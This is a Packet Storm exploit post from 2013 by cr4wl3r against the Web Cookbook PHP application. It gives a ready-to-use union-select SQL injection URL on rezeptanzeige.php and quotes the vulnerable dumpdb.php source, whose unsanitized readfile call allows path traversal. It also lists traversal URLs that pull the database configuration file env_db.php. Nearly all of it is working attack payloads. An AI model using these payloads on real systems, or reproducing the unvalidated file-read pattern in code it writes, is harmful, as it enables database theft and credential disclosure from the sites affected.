Lucene search

K
packetstormCr4wl3rPACKETSTORM:120464
HistoryFeb 21, 2013 - 12:00 a.m.

Web Cookbook File Disclosure / SQL Injection

2013-02-2100:00:00
cr4wl3r
packetstormsecurity.com
21
web cookbook
sql injection
remote file disclosure
win 7
`# Web Cookbook Multiple Vulnerability  
# By cr4wl3r http://bastardlabs.info  
# Script: http://sourceforge.net/projects/webcookbook/  
# Tested: Win 7  
  
# Proof of Concept  
# SQL Injection  
  
http://bastardlabs/[path]/rezeptanzeige.php?currid=[SQLi]  
http://bastardlabs/[path]/rezeptanzeige.php?currid=-9999%20union%20select%201,version(),3,4,5,6,7,8,9,10--  
  
# Remote File Disclosure  
# Bugs found /admin/dumpdb.php  
  
--------------------------  
1 <?php  
2 $outfile = $_GET['outfile'];  
3 header("Content-Type: text/plain");  
4 header("Content-length: " . filesize("../upload/" . $outfile));  
5 header("Content-Disposition: attachment; filename=" . $outfile);  
6 readfile("../upload/" . $outfile);  
7 ?>  
--------------------------  
  
http://bastardlabs/[path]/admin/dumpdb.php?outfile=../[file]  
http://bastardlabs/[path]/admin/dumpdb.php?outfile=../env_db.php  
  
# Demo:  
http://bastardlabs.info/demo/WebCookbook1.png  
http://bastardlabs.info/demo/WebCookbook2.png  
`